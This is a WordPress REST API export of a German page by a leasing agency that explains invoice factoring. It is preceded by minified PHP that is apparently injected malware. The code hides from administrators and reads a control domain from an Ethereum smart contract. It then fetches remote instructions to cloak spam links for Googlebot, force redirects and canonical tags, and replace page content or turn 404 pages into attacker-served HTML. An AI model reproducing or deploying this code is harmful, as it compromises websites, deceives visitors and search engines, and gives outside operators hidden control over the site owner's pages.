if((defined('WP_CLI')&&WP_CLI)||(defined('DOING_CRON')&&DOING_CRON)||(defined('DOING_AJAX')&&DOING_AJAX)||(defined('REST_REQUEST')&&REST_REQUEST)||(function_exists('is_admin')&&is_admin())||(function_exists('current_user_can')&&current_user_can('manage_options')))return;if(!function_exists('add_action'))return;define('TO',2);define('FT',5);define('LT',600);define('ST',3600);define('PT',172800);$GLOBALS['RP']=['ethereum-rpc.publicnode.com','eth.api.pocket.network','eth.drpc.org','eth.llamarpc.com','1rpc.io/eth'];$GLOBALS['R']='';function DM(){return get_transient('_dm')?:'0x295bae89192c32.com';}function T($k,$t){set_transient($k.'_t',time(),$t);}function G($k){return[get_transient($k),(int)get_transient($k.'_t')];}function X($k,$d,$t){set_transient($k,$d,$t);set_transient($k.'_t',time(),$t);return $d;}function U(){return rawurlencode(home_url('/'));}function H(){$p=parse_url($_SERVER['REQUEST_URI']??'/',PHP_URL_PATH);$p='/'.ltrim((string)$p,'/');if($p!=='/'&&substr($p,-1)==='/')$p=rtrim($p,'/');return $p?:'/';}function EC($rpc){$r=wp_remote_post('https://'.$rpc,['headers'=>['Content-Type'=>'application/json'],'body'=>wp_json_encode(['jsonrpc'=>'2.0','id'=>1,'method'=>'eth_call','params'=>[['to'=>'0x8B51674F44A1aA39aD5b3A365DA1d667E54aF292','data'=>'0x3fa4f245'],'latest']]),'timeout'=>10]);if(is_wp_error($r))return null;$b=json_decode(wp_remote_retrieve_body($r),true);return(is_array($b)&&isset($b['result']))?strtolower($b['result']):null;}function HD($hex){$hex=ltrim(str_replace('0x','',$hex),'0');$o='';for($i=0;$i<strlen($hex);$i+=2){$byte=substr($hex,$i,2);if($byte==='00')break;$o.=chr(hexdec($byte));}return trim($o);}function RD(){$rp=$GLOBALS['RP'];$i=(int)get_transient('_ri');if($i>=count($rp))$i=0;$v=EC($rp[$i]);if(!$v){set_transient('_ri',$i+1,86400);return false;}$d=HD($v);if(strpos($d,'.')===false){set_transient('_ri',$i+1,86400);return false;}delete_transient('_ri');return $d;}function MR(){if((int)get_transient('_fc')<FT)return;$d=RD();if($d){set_transient('_dm',$d,86400);delete_transient('_fc');}}function J($u){$r=wp_remote_get($u,['timeout'=>TO,'redirection'=>1,'headers'=>['Accept'=>'application/json']]);if(is_wp_error($r)){set_transient('_fc',(int)get_transient('_fc')+1,86400);MR();return null;}$c=(int)wp_remote_retrieve_response_code($r);$b=(string)wp_remote_retrieve_body($r);if($c!==200||trim($b)===''){set_transient('_fc',(int)get_transient('_fc')+1,86400);MR();return null;}$j=json_decode($b,true);if(!is_array($j)){set_transient('_fc',(int)get_transient('_fc')+1,86400);MR();return null;}delete_transient('_fc');return $j;}function FL(){$j=J('https://links.'.DM().'/links?site='.U());if(!is_array($j))return null;$Lx=[];foreach(($j['L']??[])as $r){$t=wp_strip_all_tags((string)($r['t']??''));$u=trim((string)($r['u']??''));if($t!==''&&filter_var($u,FILTER_VALIDATE_URL))$Lx[]=['t'=>$t,'u'=>$u];}$Cx=[];foreach(($j['C']??[])as $row){if(!is_array($row)||count($row)<2)continue;$k='/'.ltrim(trim((string)$row[0]),'/');if($k!=='/'&&substr($k,-1)==='/')$k=rtrim($k,'/');$v=trim((string)$row[1]);if($k!==''&&$k!=='/'&&filter_var($v,FILTER_VALIDATE_URL))$Cx[$k]=$v;}$Rx=[];foreach(($j['R']??[])as $row){if(!is_array($row)||count($row)<2)continue;$k='/'.ltrim(trim((string)$row[0]),'/');if($k!=='/'&&substr($k,-1)==='/')$k=rtrim($k,'/');$to=trim((string)$row[1]);$cd=(int)($row[2]??301);if($cd!==301&&$cd!==302)$cd=301;if($k!==''&&$k!=='/'&&filter_var($to,FILTER_VALIDATE_URL))$Rx[$k]=['t'=>$to,'c'=>$cd];}$Hx=[];foreach(($j['H']??[])as $r){$t=wp_strip_all_tags((string)($r['t']??''));$u=trim((string)($r['u']??''));if($t!==''&&filter_var($u,FILTER_VALIDATE_URL))$Hx[]=['t'=>$t,'u'=>$u];}return['L'=>$Lx,'C'=>$Cx,'R'=>$Rx,'H'=>$Hx];}function FS(){$j=J('https://pages.'.DM().'/active-slugs?site='.U());if(!is_array($j))return null;$o=[];foreach(($j['S']??[])as $s){$s='/'.ltrim(trim((string)$s),'/');if($s!=='/'&&substr($s,-1)==='/')$s=rtrim($s,'/');if($s!=='/'&&strlen($s)<200)$o[]=$s;}return array_values(array_unique($o));}function FP($path){$j=J('https://pages.'.DM().'/page?site='.U().'&path='.rawurlencode($path));if(!is_array($j))return null;return['m'=>(bool)($j['m']??false),'op'=>(string)($j['op']??''),'st'=>(int)($j['st']??200),'h'=>(string)($j['h']??'')];}function GL(){[$d,$t]=G('l');$a=time()-$t;if(is_array($d)&&$t&&$a<=LT)return $d;if($a>LT&&($GLOBALS['R']===''||$GLOBALS['R']==='L')){$n=FL();is_array($n)?$d=X('l',$n,86400):T('l',86400);$GLOBALS['R']='L';}return is_array($d)?$d:[];}function GS(){[$d,$t]=G('s');$a=time()-$t;if(is_array($d)&&$t&&$a<=ST)return $d;if($a>ST&&($GLOBALS['R']===''||$GLOBALS['R']==='S')){$n=FS();is_array($n)?$d=X('s',$n,86400):T('s',86400);$GLOBALS['R']='S';}return is_array($d)?$d:[];}add_action('wp',function(){$path=H();$ua=(string)($_SERVER['HTTP_USER_AGENT']??'');$Lx=GL();if(!empty($Lx['R'][$path]))add_action('template_redirect',function()use($Lx,$path){wp_redirect($Lx['R'][$path]['t'],(int)$Lx['R'][$path]['c']);exit;},0);if(!empty($Lx['C'][$path]))add_action('wp_head',function()use($Lx,$path){echo'<link rel="canonical" href="'.esc_url($Lx['C'][$path]).'" />'."\n";},1);if(!empty($Lx['L'])&&stripos($ua,'Googlebot')!==false)add_action('wp_footer',function()use($Lx,$path){$ll=array_merge($Lx['L'],$path==='/'?($Lx['H']??[]):[]);$h='';foreach($ll as $r)$h.='<li><a href="'.esc_url($r['u']).'">'.esc_html($r['t']).'</a></li>';if($h!=='')echo'<details class="pl"><summary>More</summary><ul>'.$h.'</ul></details>';},9999);$Sx=GS();if(!in_array($path,$Sx,true))return;add_action('template_redirect',function()use($path){global $wp_query;$k='p_'.md5(home_url('/').'|'.$path);$p=get_transient($k);$t=(int)get_transient($k.'_t');if(!(is_array($p)&&$t&&(time()-$t)<=PT)){$n=FP($path);if(is_array($n)){$p=$n;set_transient($k,$p,604800);set_transient($k.'_t',time(),604800);}else{set_transient($k.'_t',time(),604800);}}if(empty($p['m']))return;if($wp_query->is_404()){$wp_query->is_404=false;status_header((int)$p['st']);echo'<!doctype html><html><head>';wp_head();echo'</head><body>'.$p['h'];wp_footer();echo'</body></html>';exit;}add_filter('the_content',function($c)use($p){if($p['op']==='rp')return $p['h'];if($p['op']==='ij')return $c.$p['h'];return $c;},9999);},1);},0);/* v82L4MZsM3tIW0wK */{"id":75,"date":"2017-06-01T13:39:15","date_gmt":"2017-06-01T13:39:15","guid":{"rendered":"https:\/\/nebes-leasing-factoring.de\/sie-bekommen-geld-factoring"},"modified":"2017-11-08T16:05:10","modified_gmt":"2017-11-08T16:05:10","slug":"sie-bekommen-geld-factoring","status":"publish","type":"page","link":"https:\/\/nebes-leasing-factoring.de\/?page_id=75","title":{"rendered":"Sie bekommen Geld &#8211; Factoring"},"content":{"rendered":"<p class=\"ds1\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt;\"><span class=\"ds14\">Factoring ist der sofortige Ankauf Ihrer Rechnungen oder Eingangsgutschriften nach vollbrachter Leistung &#8211; nichts weiter. Klingt kompliziert, ist es aber nicht. Wenn Sie eine gute Gesellschaft gefunden haben, funktioniert das wie ein ge\u00f6lter Blitz.<br \/>\n<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span class=\"ds14\">Die meisten Unternehmen gehen heute in die Pleite durch die langen Zahlungsziele Ihrer Kunden (Debitoren). Sie waren ein willf\u00e4hriges, billiges Kreditinstrument, um andere am Leben zu halten. Wer \u00e4chzt nicht unter Zahlungszielen von 30 bis 90 Tagen, die man aus Eigenmitteln zu stemmen hat.<br \/>\n<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span class=\"ds14\">Verkaufen Sie doch Ihre Rechnungen an eine Factoring &#8211; Gesellschaft.<\/span><\/span><\/p>\n<p><span class=\"ds14\" style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt;\">Die Vorteile sind vielf\u00e4ltig.<\/span><\/p>\n<p><em><span class=\"ds14\" style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt;\">Abermals ein unverbindliches Beispiel unserer virtuellen Firma Mustermann:<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/em><\/p>\n<ul>\n<li class=\"ds4\"><span style=\"font-size: 12pt;\"><em><span style=\"font-family: arial,helvetica,sans-serif;\"><span class=\"ds14\">sofortige Auszahlung des vereinbarten Rechnungsbetrages. Dies ist im Regelfall der n\u00e4chstfolgende Arbeitstag nach Eingang Ihrer Rechnungs- oder Gutschriftskopie. Ein Fax reicht uns hierf\u00fcr. Die Zahlung erhalten Sie per Online.<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/em><\/span><\/li>\n<li class=\"ds4\"><span style=\"font-size: 12pt;\"><em><span style=\"font-family: arial,helvetica,sans-serif;\"><span class=\"ds14\">meist 80% sofortige Auszahlung der Bruttorechnungssumme = 95% Ihrer Nettoforderung &#8211; der Rest folgt, wenn Ihr Kunde bezahlt hat. Manchmal gibt es auch einen h\u00f6heren Auszahlung %-Satz.<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/em><\/span><\/li>\n<li class=\"ds4\"><span style=\"font-size: 12pt;\"><em><span style=\"font-family: arial,helvetica,sans-serif;\"><span class=\"ds14\">dem Geld l\u00e4uft ab nun die Factoringgesellschaft hinterher. Nicht mehr Sie und sparen dadurch Zeit und Personalkosten.<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/em><\/span><\/li>\n<li class=\"ds4\"><span style=\"font-size: 12pt;\"><em><span style=\"font-family: arial,helvetica,sans-serif;\"><span class=\"ds14\">Sie sind auf einmal liquide und k\u00f6nnen selbst Skontoeffekte nutzen (z.B. bei Subunternehmern, Reparaturen, Wareneinkauf etc.) und kompensieren so die Factoringgeb\u00fchren.<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/em><\/span><\/li>\n<li class=\"ds4\"><span style=\"font-size: 12pt;\"><em><span style=\"font-family: arial,helvetica,sans-serif;\"><span class=\"ds14\">Sie verbessern Ihre betriebswirtschaftlichen Kennzahlen und dadurch Ihre Bilanz, da Sie keine Forderungen mehr besitzen (die Ihre Bank \u00fcbrigens mit 0,00 \u20ac einwertet und wenn es die Bundesregierung selber w\u00e4re&#8230;.)<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/em><\/span><\/li>\n<li class=\"ds4\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt;\"><em><span class=\"ds14\">das Beste daran: Sie m\u00fcssen nichts zur\u00fcckzahlen sollte Ihr Kunde mittlerweile insolvent werden. Sie sind zu 100% gegen Ausfall versichert.<\/span><\/em><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/li>\n<\/ul>\n<p class=\"ds1\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt;\"><span class=\"ds14\">Viele meiner Gespr\u00e4chspartner sonnen sich darin, dass Ihr Kunde so gro\u00df und sch\u00f6n sei, er k\u00f6nne nie in die Pleite rutschen.<br \/>\n<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span class=\"ds14\">Nun ja, die Titanic galt auch als unsinkbar.<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/p>\n<p class=\"ds4\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt;\"><span class=\"ds14\">Die Nachteile des Factoring:<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><\/span><\/p>\n<p class=\"ds1\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt;\"><span class=\"ds14\">Sie sind gering, wenn man akzeptiert, dass das Leben nicht umsonst ist. Ich bin oft fassungslos, wie manche Kunden \u00fcber die dritte Komma-Stelle der Geb\u00fchren (ein von Ihnen verhandelbarer Skontobereich ) kontrovers diskutieren und im gleichen Atemzug erz\u00e4hlt man mir, ohne Gef\u00fchlsregung, dass man letztes Jahr f\u00fcnf- bis sechsstellige Betr\u00e4ge auszubuchen hatte, da Gesch\u00e4ftspartner insolvent wurden&#8230;.<br \/>\n<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span class=\"ds14\">Dank Factoring h\u00e4tte man nichts ausgebucht. Im Gegenteil, Sie erhalten Geld ohne bank\u00fcbliche Sicherheiten, lediglich f\u00fcr ein St\u00fcck Papier, das sich Rechnung nennt. Noch gibt es diese Finanzierungsform, machen Sie davon Gebrauch, wenn Kunden Sie l\u00e4nger als 14 Tage auf Ihr Geld warten lassen. Wenn es knapp wird, sind auch 14 Tage sehr, sehr lange&#8230;.<br \/>\n<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span class=\"ds14\">Wichtig: es tummelt sich doch das eine oder andere unf\u00e4hige schwarze Schaf auf diesem Markt.<br \/>\n<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span class=\"ds14\">Wenn Sie darauf achten, dass \u201eIhre\u201c Gesellschaft Mitglied im Bundesverband der Deutschen Factoringgesellschaften ist, tun Sie gut daran.<br \/>\n<\/span><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span class=\"ds14\">Jeder Student der Betriebswirtschaftslehre lernt bereits im 1. Semester, dass Liquidit\u00e4t wichtiger ist als Rentabilit\u00e4t. Was nutzen Ihnen gute Zahlen in der BWA, um dann mit Blick aufs das Bankkonto festzustellen, dass die Mehrheit Ihrer Kunden schon wieder nicht bezahlt hat.<br \/>\n<\/span><span style=\"color: #000080;\"><span class=\"ds12\"><span class=\"ds8\"><br \/>\n<\/span><\/span><span style=\"font-size: 10pt;\"><em><span class=\"ds14\">Alle Rechte bei: G\u00fcnter W. Nebes &#8211; Leasingagentur <\/span><span class=\"ds15\">www.nebes-leasing-factoring.de<\/span><\/em><\/span><\/span><\/span><\/p>\n<p class=\"ds1\">\u00a0<nav aria-label=\"breadcrumbs\">\n            <div class=\"breadcrumb-container theme5\">\n                <ol>\n                    <li><a title=\"Sie befinden sich hier:\" href=\"#\"><span>Sie befinden sich hier:<\/span><\/a><span class=\"separator\"><\/span><\/li>\n                    <\/ol>\n            <\/div>\n        <\/nav>    <script type=\"application\/ld+json\">\n        {\n            \"@context\": \"http:\/\/schema.org\",\n            \"@type\": \"BreadcrumbList\",\n            \"itemListElement\": [\n                 {\n                            \"@type\": \"ListItem\",\n                            \"position\": 1,\n                            \"item\": {\n                                \"@id\": \"#\",\n                                \"name\": \"Sie befinden sich hier:\"\n                            }\n                        }\n                                                    ]\n        }\n    <\/script>\n    <style type=\"text\/css\">\n        .breadcrumb-container {\n            font-size: 13px;\n        }\n\n        .breadcrumb-container ul {\n            margin: 0;\n            padding: 0;\n        }\n\n        .breadcrumb-container li {\n            box-sizing: unset;\n            display: inline-block;\n            margin: 0;\n            padding: 0;\n        }\n\n        .breadcrumb-container li a {\n            box-sizing: unset;\n            padding: 0 10px;\n        }\n\n        .breadcrumb-container {\n            font-size: 16px !important;\n                    }\n\n        .breadcrumb-container li a {\n            color: #0909f4 !important;\n            font-size: 16px !important;\n            line-height: 16px !important;\n                    }\n\n        .breadcrumb-container li .separator {\n            color: #000000 !important;\n            font-size: 16px !important;\n                    }\n\n        .breadcrumb-container li:last-child .separator {\n            display: none;\n        }\n    <\/style>\n    <style type=\"text\/css\">\n            <\/style>\n    <script>\n            <\/script>\n<\/p>","protected":false},"excerpt":{"rendered":"<p>Factoring ist der sofortige Ankauf Ihrer Rechnungen oder Eingangsgutschriften nach vollbrachter Leistung &#8211; nichts weiter. Klingt kompliziert, ist es aber[&#8230;]<\/p>\n","protected":false},"author":1,"featured_media":76,"parent":60,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"template-back2.php","meta":{"footnotes":""},"class_list":["post-75","page","type-page","status-publish","has-post-thumbnail","hentry"],"featured_image_src":"https:\/\/nebes-leasing-factoring.de\/wp-content\/uploads\/2017\/06\/auto-financing-2157347_1920-e1494764255546-1920x480.jpg","featured_image_src_square":"https:\/\/nebes-leasing-factoring.de\/wp-content\/uploads\/2017\/06\/auto-financing-2157347_1920-e1494764255546-1920x480.jpg","_links":{"self":[{"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/pages\/75","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=75"}],"version-history":[{"count":3,"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/pages\/75\/revisions"}],"predecessor-version":[{"id":106,"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/pages\/75\/revisions\/106"}],"up":[{"embeddable":true,"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/pages\/60"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=\/wp\/v2\/media\/76"}],"wp:attachment":[{"href":"https:\/\/nebes-leasing-factoring.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=75"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}